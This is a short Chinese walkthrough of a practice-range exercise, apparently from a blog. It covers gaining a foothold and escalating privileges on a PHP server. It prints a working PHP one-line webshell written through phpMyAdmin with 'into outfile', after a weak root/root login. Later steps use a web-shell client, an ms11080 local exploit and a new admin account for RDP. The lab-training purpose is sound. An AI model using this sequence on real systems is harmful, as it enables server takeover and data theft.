i春秋DMZ大型靶場實驗(二)提權漏洞
拿到靶場 直接進行掃描 爆破路徑php
發現 phpinfo, phpmyadmin 更具phpinfo 獲取跟路徑 也能夠經過 sql
輸入錯路徑爆出絕對路徑blog
phpmyamin 弱口令登陸 root,root登錄
sql 直接寫一句話木馬file
select '<?php eval($_POST[1])?>' into outfile 'C:\\phpStudy\\WWW\\1.php'select
菜刀鏈接 上傳 ms11080.exe 提權 添加 90sec 用im
mstsc 直接遠程登陸img
相關文章
- 1. i春秋DMZ大型靶場實驗(二)提權漏洞
- 2. i春秋DMZ大型靶場實驗(四)Hash基礎
- 3. i春秋DMZ大型靶場實驗(一)內網拓展
- 4. i春秋DMZ大型靶場實驗(三)內網轉發DMZ2
- 5. i春秋web-Test(海洋CMS漏洞)
- 6. xss存儲型漏洞靶場實現
- 7. 反射型xss漏洞(DVWA靶場)
- 8. vulhub漏洞靶場搭建
- 9. 漏洞利用與提權(二):Linux漏洞利用與提權
- 10. i春秋-百度杯九月場-YeserCMS(cmseasy的UpdateXML注入漏洞)
- 更多相關文章...
- • MySQL BIT、BINARY、VARBINARY、BLOB(二進制類型) - MySQL教程
- • Hibernate整合EHCache實現二級緩存 - Hibernate教程
- • Kotlin學習(二)基本類型
- • JDK13 GA發佈:5大特性解讀
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
